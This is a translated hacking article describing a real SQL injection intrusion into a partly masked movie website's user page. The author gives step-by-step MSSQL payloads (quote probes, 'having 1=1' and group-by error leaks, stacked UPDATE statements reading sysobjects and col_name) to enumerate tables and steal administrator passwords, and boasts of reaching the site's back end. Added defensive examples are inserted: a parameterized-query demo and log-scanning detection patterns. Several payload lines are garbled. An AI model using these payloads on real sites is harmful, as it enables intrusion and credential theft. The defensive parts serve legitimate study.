Author of the article: Leaf [EST]
Source: Evil Eight Bao China
Obtaining table names and field names. Applicable when:
1) the database is MSSQL;
2) the database connection uses only an ordinary user account;
3) the ASP source code is unknown.
Possible impact:
1) adding, viewing and changing data.
Example:
Target page:
http://www.dy**.com/user/wantpws.asp
Testing the injection against its input fields.
First step:
Enter a single quote in the user name field. The page displays:
Microsoft OLE DB Provider for SQL Server Error 80040E1 Unclosed quotation mark before the character string. /user/wantpws.asp, line 63
This shows that single quotes are not filtered and that the database is MSSQL.
Second step:
Enter: a; use master;
The page displays:
Microsoft OLE DB Provider for SQL Server Error 80040E21 Multiple-step OLE DB operation generated errors. Check each OLE DB status value, if available. No work was done. /user/wantpws.asp, line 63
This shows that the connection does not have that permission.
Third step:
Enter: a or name like fff%;
A user named ffff is displayed.
Fourth step:
Enter in the user name field:
FFFF AND 1 <> (Select Count (Email) from "");
The page displays:
Microsoft OLE DB Provider for SQL Server Error 80040E37 Invalid object name 'User'. /user/wantpws.asp, line 96
This shows that there is no table called User; once the table-name guess succeeds, you learn that the table has a column called Email.
(A more direct way is to enter: a having 1 = 1--
The returned error usually gives you a table name and a field name straight away:
Microsoft OLE DB Provider for SQL Server Error 80040E14 Column 'Users.ID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /user/wantpws.asp, line 63
)
Now we know that the password of user FFFF is 111111.
With statements like these you can obtain every table name and field name in the database.
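The root cause behind steps 1 to 4 is that the page splices the user name straight into the SQL text and echoes the provider's error back to the browser. The following is an added example, not code from the article or from the site it describes: it rebuilds the two query styles side by side on an in-memory SQLite table (a constructed stand-in for the MSSQL users table, with made-up rows) and runs the article's own probes (a lone quote, and the "a' or name like 'fff%" input from step 3) against both. The function and table names are assumptions for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's users table (SQLite in memory, not the real MSSQL database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "ffff", "ffff@example.invalid", "111111"),          # sample row, constructed
        (2, "admin", "admin@example.invalid", "not-the-real-one"),  # sample row, constructed
    ])
    return conn


def lookup_vulnerable(conn, username):
    """The pattern the ASP page evidently used: the input is spliced into the SQL text."""
    sql = "SELECT name, email FROM users WHERE name = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameterized query: the input is bound as a value and is never parsed as SQL."""
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (username,)).fetchall()


def raises_db_error(lookup, conn, username):
    """True if the lookup throws a database error for this input; step 1 of the article
    depends on exactly this error reaching the browser."""
    try:
        lookup(conn, username)
        return False
    except sqlite3.Error:
        return True


def safe_lookup_for_page(conn, username):
    """How the page should answer: parameterized lookup, and any database error is
    replaced by a generic message instead of the provider's text and line number."""
    try:
        return {"rows": lookup_safe(conn, username), "error": None}
    except sqlite3.Error:
        return {"rows": [], "error": "Lookup failed"}


if __name__ == "__main__":
    conn = make_db()
    for probe in ["ffff", "'", "a' or name like 'fff%"]:
        if raises_db_error(lookup_vulnerable, conn, probe):
            vulnerable_result = "database error leaks to the browser"
        else:
            vulnerable_result = lookup_vulnerable(conn, probe)
        print(repr(probe), "| concatenated:", vulnerable_result, "| parameterized:", lookup_safe(conn, probe))
```

With the concatenated query, the lone quote produces a database error (the signal from step 1) and the "or name like" input returns the ffff row even though no user is called "a' or name like 'fff%" (step 3). With the parameterized query the same inputs are just user names that do not exist, so the stacked UPDATE statements and the having/group by probes used later in the article have no way in, and the generic error handling removes the column-name disclosure that the error messages provide.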
Fifth step:
Enter:
FFF; Update [users] set email = (select top 1 name from sysobjects where xtype = u and status > 0) where name = fff;
Description:
The statement above fetches the first user table in the database and writes its name into the e-mail field of user FFFF.
Viewing the profile of user FFFF then shows that the first table is called AD.
Next, get the ID of this table from its name AD:
FFF; Update [users] set email = (select top 1 id from sysobjects where xtype = u and name = ad) where name = fff;
The ID obtained is: 581577110
Since object IDs are assigned in increasing order, we can get the names of all user tables one after another.
The name of the second table is obtained like this:
ffff; update [users] set email = (select top 1 name from sysobjects where xtype = u and id > 581577110) where name = ffff; --
After a while of guessing, the user tables and their IDs were:
ad 581577110
users 597577167
buy 613577224
car 629577281
learning 645577338
log 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk
From the list above it is clear that Password and users are the most interesting tables.
Step 6: guess the fields of the important tables
Enter the following to see what fields the users table has:
FFF; Update [users] set email = (select top 1 col_name (Object_ID (users), 3) where name = fff;
The third field is Password.
FFF; Update [users] set email = (select top 1 col_name (Object_ID (users), 4) where name = fff;
The fourth field is Name.
In the end all fields of the USERS table were obtained.
(Note: another way to get the fields, provided the system returns error messages:
a group by id having 1 = 1--
returns
Microsoft OLE DB Provider for SQL Server Error 80040E14
Column 'Users.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/user/wantpws.asp, line 63
So the second field is UserID.
To show the third field:
a group by id, userid having 1 = 1--
Microsoft OLE DB Provider for SQL Server Error 80040E14
Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/user/wantpws.asp, line 63
This gives Password.
Continue in the same way and every field is displayed. :)
)
users table (column number and name):
1 id, 2 userid, 3 password, 4 name,
5 Province, 6 homeaddress, 7 city, 8 adress, 9 starlook, 10 sex, 11 email, 12 nlook, 13 nos, 14 date, 15 money, 16 send,
17 oklook, 18 dnlook, 19 lasthits, 20 phone, 21 askmejoin, 22 getmoney, 23 payno, 24 logintime, 25 mflag, 26 State, 27 Post, 28 Note
STARLOOK - 12 10 2003 2:41 PM
NLOOK --- 0
NOS - 2 (number of logins)
Date - 12 10 2003 12:00 AM (registration time?)
Money -
Send - empty
Oklook - 0
DNLOOK - 0
GetMoney - 0
State - 0
Note - "This guy is very. . ." (a description field)
Password table (column number and name):
1 ID, 2 Name, 3 PWD
Then I tried the AD table; it records advertising click points.
Next, the Name and PWD fields of the Password table were fetched.
Executing:
FFF; Update [users] set email = (select top 1 name from password) where name = fff; --
gives the first user name, which, as on most sites, is administrator. Then I got the password, DY *** DICK188 or thereabouts, haha...
In this way we got into the back end of this movie website. Haha.
http://www.dy**.com/login.asp
Going further, we can also find out that there are three administrator passwords in total:
FFF; Update [users] set email = (select top 1 count (id) from password) where name = fff; --
fff; update [users] set email = (Select Top 1 PWD from password where id = 2) where name = ffff; --
fff; Update [users] set email = (select top 1 name from password where id = 2) where name = fff;
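Every step in this write-up leaves a visible trace: a quote-bearing request that draws a server error, "having 1=1" and "group by" probes, sysobjects and col_name lookups, and stacked "; update [users]" statements, plus the provider error codes 80040E14, 80040E37 and 80040E21 in the application's error output. The following is an added example from the defender's side, not part of the article: it runs those markers over a handful of constructed, IIS-style access-log lines and application-error lines (fictional timestamps, addresses and paths in the article's format) after URL-decoding the request. The log format, pattern names and helper functions are assumptions for the example.

```python
import re
from urllib.parse import unquote_plus

# Provider error codes that the write-up shows the ASP page echoing to the browser.
OLEDB_ERROR_CODES = {"80040E14", "80040E37", "80040E21"}

# Markers drawn from the payloads in the write-up, matched against the URL-decoded request.
INJECTION_PATTERNS = [
    ("quote-or-like", re.compile(r"'\s*or\s+\w+\s+like\b", re.I)),
    ("having-probe", re.compile(r"\bhaving\s+1\s*=\s*1", re.I)),
    ("sysobjects-enum", re.compile(r"\bsysobjects\b", re.I)),
    ("col_name-enum", re.compile(r"\bcol_name\s*\(", re.I)),
    ("stacked-update", re.compile(r";\s*update\s+\[?users\]?", re.I)),
]

# Constructed access-log lines (date time client method uri status); not taken from the real site.
SAMPLE_ACCESS_LOG = [
    "2003-12-10 14:40:55 10.0.0.5 GET /user/wantpws.asp?name=ffff 200",
    "2003-12-10 14:41:02 10.0.0.5 GET /user/wantpws.asp?name=%27 500",
    "2003-12-10 14:41:10 10.0.0.5 GET /user/wantpws.asp?name=a%27+or+name+like+%27fff%25 200",
    "2003-12-10 14:41:20 10.0.0.5 GET /user/wantpws.asp?name=a%27+having+1%3D1-- 500",
    "2003-12-10 14:41:35 10.0.0.5 GET /user/wantpws.asp?name=ffff%3B+update+%5Busers%5D+set+email%3D%28select+top+1+name+from+sysobjects%29-- 200",
    "2003-12-10 14:42:00 10.0.0.9 GET /index.asp 200",
]

# Constructed application-error lines in the shape the write-up quotes.
SAMPLE_APP_ERRORS = [
    "Microsoft OLE DB Provider for SQL Server Error 80040E14 Column 'Users.ID' is invalid in the select list /user/wantpws.asp, line 63",
    "Microsoft OLE DB Provider for SQL Server Error 80040E37 Invalid object name 'User'. /user/wantpws.asp, line 96",
    "Some unrelated line with no provider error",
]


def classify_request(line):
    """Tags for one access-log line: injection markers found in the decoded URI, plus a
    flag when a request containing a single quote drew a 5xx response (the step 1 signal)."""
    fields = line.split()
    uri, status = fields[4], int(fields[5])
    decoded = unquote_plus(uri)
    tags = [name for name, pattern in INJECTION_PATTERNS if pattern.search(decoded)]
    if status >= 500 and "'" in decoded:
        tags.append("quote-in-error-response")
    return tags


def scan_access_log(lines):
    """Map line index -> tags, for lines that received at least one tag."""
    result = {}
    for i, line in enumerate(lines):
        tags = classify_request(line)
        if tags:
            result[i] = tags
    return result


def scan_app_errors(lines):
    """Provider error codes from the write-up found in application-error lines, in order of appearance."""
    found = []
    for line in lines:
        m = re.search(r"Error\s+(80040E[0-9A-F]+)", line)
        if m and m.group(1) in OLEDB_ERROR_CODES:
            found.append(m.group(1))
    return found


if __name__ == "__main__":
    for i, tags in scan_access_log(SAMPLE_ACCESS_LOG).items():
        print(i, SAMPLE_ACCESS_LOG[i].split()[4], tags)
    print("provider errors seen:", scan_app_errors(SAMPLE_APP_ERRORS))
```

Matching is done on the decoded request because the probes arrive URL-encoded, and the 5xx-plus-quote rule catches the very first step of the article before any recognizable payload appears. Any provider error code showing up in what the application sends to clients is itself a finding: the page should return a generic error and keep the provider text in a server-side log.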